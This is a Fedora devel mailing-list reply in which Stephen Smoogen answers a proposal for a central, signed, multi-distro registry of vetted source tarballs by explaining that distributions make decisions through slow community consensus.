On Sat, 30 Mar 2024 at 13:26, Artem S. Tashkinov via devel < devel@lists.fedoraproject.org> wrote:
> > I propose this issue to be tackled in a centralized way by the > collaboration of major distros. > > There must be a website or a central authority which includes known to be > good/safe/verified/vetted open source packages along with e.g. > SHA256/384/512/whatever hashes of the source tarballs. In addition, the > source tarballs (not their compressed versions because people may use > different compressors and compression settings) and their hashes must be > digitally signed or have the appropriate PGP signatures from the trusted > parties. > > Some parties must be assigned trust to be able to push new packages to > this repository. Each push must be verified by at least two independent > parties, let's say RedHat and Ubuntu or Ubuntu and Arch, it doesn't matter. > The representatives of these parties must be people whose whereabouts are > known to confirm who they physically are. No nicknames allowed. > > This website must also have/allow a revocation mechanism for situations > like this. > > Now Fedora/Arch/Debian/Ubuntu/whatever distros can build packages knowing > they are safe to use. > > If that's the wrong place to come up with this proposal, please forward it > to the people who are responsible for making such decisions. I'm not > willing to dig through the dirt to understand how the Fedora project works, > who is responsible for what, and what are the appropriate communication > channels. If you care, you'll simply forward my message. Thanks a lot. > > There is no one who makes such decisions for any of the distros. Most of the distributions make decisions by consensus of hundreds of individuals who read a list and come to the conclusion that they are 'going to dig through the dirt' to make something happen or not. For changes like what you propose, you need groups of people to work for years to get all the agreements in place, get the various tooling adapted, and work out all the personalities involved. It will usually start with an email like this, and then various disagreements about how it will never work, and then some group of people to actually try to get something like it to work somewhere. At which point, the next round of 'well did you think about..' problems arrive and either the people are able to fix them or the idea gets shelved until later. > Best regards, > Artem > -- > _______________________________________________ > devel mailing list -- devel@lists.fedoraproject.org > To unsubscribe send an email to devel-le...@lists.fedoraproject.org > Fedora Code of Conduct: > https://docs.fedoraproject.org/en-US/project/code-of-conduct/ > List Guidelines: https://fedoraproject.org/wiki/Mailing_list_guidelines > List Archives: > https://lists.fedoraproject.org/archives/list/devel@lists.fedoraproject.org > Do not reply to spam, report it: > https://pagure.io/fedora-infrastructure/new_issue > -- Stephen Smoogen, Red Hat Automotive Let us be kind to one another, for most of us are fighting a hard battle. -- Ian MacClaren
-- _______________________________________________ devel mailing list -- devel@lists.fedoraproject.org To unsubscribe send an email to devel-le...@lists.fedoraproject.org Fedora Code of Conduct: https://docs.fedoraproject.org/en-US/project/code-of-conduct/ List Guidelines: https://fedoraproject.org/wiki/Mailing_list_guidelines List Archives: https://lists.fedoraproject.org/archives/list/devel@lists.fedoraproject.org Do not reply to spam, report it: https://pagure.io/fedora-infrastructure/new_issue
